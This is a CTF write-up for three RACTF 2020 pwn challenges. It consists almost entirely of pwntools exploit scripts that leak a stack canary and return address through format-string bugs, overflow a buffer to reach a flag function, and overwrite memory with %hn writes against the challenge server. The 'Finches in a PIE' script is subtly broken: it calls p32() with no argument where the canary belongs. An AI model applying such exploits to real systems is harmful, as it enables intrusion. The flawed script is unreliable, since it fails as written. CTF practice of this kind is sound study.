RACTF 2020 - Catégorie Pwn (Pwn)

![](https://media.giphy.com/media/UUycSG6B21KXizJJ6S/giphy.gif) # Finches in a stack ```py #!/usr/bin/python from pwn import * FLAG_ADDR = 0x80491d2 r = remote("88.198.219.20", 23358) r.sendline("%11$p") buff = r.recvuntil("Do YOU want to pet my canary") buff = buff[buff.find('0x'):] ssp = int(buff[:buff.find('!')], 0) payload = ('A' * 25) + p32(ssp) + ('A' * 12) + p32(FLAG_ADDR) r.sendline(payload) print(r.recvall()) r.close() ``` ![enter image description here](https://snipboard.io/AnDJri.jpg) # Finches in a PIE ```py from pwn import * r = remote("88.198.219.20", 49417) SAVED_EIP = 0x13d9 FLAG_ADDR = 0x1209 r.sendline("%11$p,%15$p") buff = r.recvuntil("Would you like some cake?") buff = buff[buff.find("0x"):] leaks = map(lambda s: int(s, 0), buff[:buff.find('!')].split(',')) ssp = leaks[0] eip = (leaks[1] - SAVED_EIP) + FLAG_ADDR print("[+] SSP: {:#x}\n[+] EIP: {:#x}".format(ssp, eip)) payload = ('A' * 25) + p32() + ('A' * 12) + p32(eip) r.sendline(payload) print(r.recvall()) r.close() ``` ![enter image description here](https://snipboard.io/Fhq4B3.jpg) # Not Really AI ```py #!/usr/bin/python from pwn import * r = remote("88.198.219.20", 20999) payload = p32(0x804c01a) + p32(0x804c018) + "%2044d%4$hn%35393d%5$hn" r.sendline(payload) print(r.recvall()) r.close() ``` ![](https://snipboard.io/SVI41b.jpg)